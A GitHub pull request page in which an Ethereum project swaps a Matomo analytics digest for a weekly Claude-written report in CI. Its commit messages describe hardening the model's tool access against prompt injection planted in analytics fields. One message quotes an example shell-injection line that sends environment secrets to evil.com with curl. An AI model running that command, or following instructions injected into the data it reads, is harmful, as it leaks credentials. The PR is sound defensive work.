Replace Matomo digest script with Claude report#154
Merged
wolovim merged 6 commits intoethereum:mainfrom Mar 18, 2026
Merged
Conversation
dionysuzx
force-pushed
the
llm-analytics-report
branch
from
d001ef8 to
4530c04
Compare
dionysuzx
commented
Mar 5, 2026
dionysuzx
force-pushed
the
llm-analytics-report
branch
11 times, most recently
from
bb13d40 to
b8a49eb
Compare
Add --tools flag to whitelist only the intended tools (Bash, Read, Glob, Grep), preventing the model from reaching for non-approved tools that would stall the non-interactive CI run.
Add persist-credentials: false to actions/checkout to prevent the GitHub token from being stored in .git/config, where Claude's git:* commands could read it.
Add a check that each fetched response is a valid JSON object or array before checking for API errors. Prevents HTML or other non-JSON responses (e.g., from proxy/login pages returning HTTP 200) from silently passing through as valid data.
dionysuzx
force-pushed
the
llm-analytics-report
branch
from
d09ef2f to
131ff05
Compare
dionysuzx
changed the title
Restrict git to read-only subcommands (log, diff, show, shortlog, rev-parse, branch) — the previous Bash(git:*) pattern allowed git push/clone/fetch/ls-remote, enabling network egress from a prompt injection payload embedded in user-controlled analytics fields. Also sanitize Matomo JSON strings: truncate to 200 chars and collapse newlines before feeding them to the LLM.
Bash command pattern matching (e.g. Bash(git log *)) cannot prevent shell metacharacter injection (e.g. "git log; curl evil.com/?k=$(cat /proc/self/environ)"), so any Bash access is an exfiltration vector. Pre-fetch git context (full log with commit bodies, recent diffstats, contributor counts) in a separate workflow step and pass it to Claude via --add-dir. Claude now has Read/Glob/Grep only — no shell access.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
How it works
matomo-fetch.shfetches analytics data from Matomo (12 API queries to named files in/tmp/matomo/)gitcommands only) and generates a formatted reportSecurity model
LLM tools restricted tollm only reads off disk, pulled out bashBash(git:*),Read,Glob,Grep— no network access, no file writesCosts
using sonnet 4.6 with 15 max turns, this runs weekly; cost should be relatively small.
Test plan
workflow_dispatchwithdry_run: true— full report generated successfullydry_run: false— report posted to Mattermost channel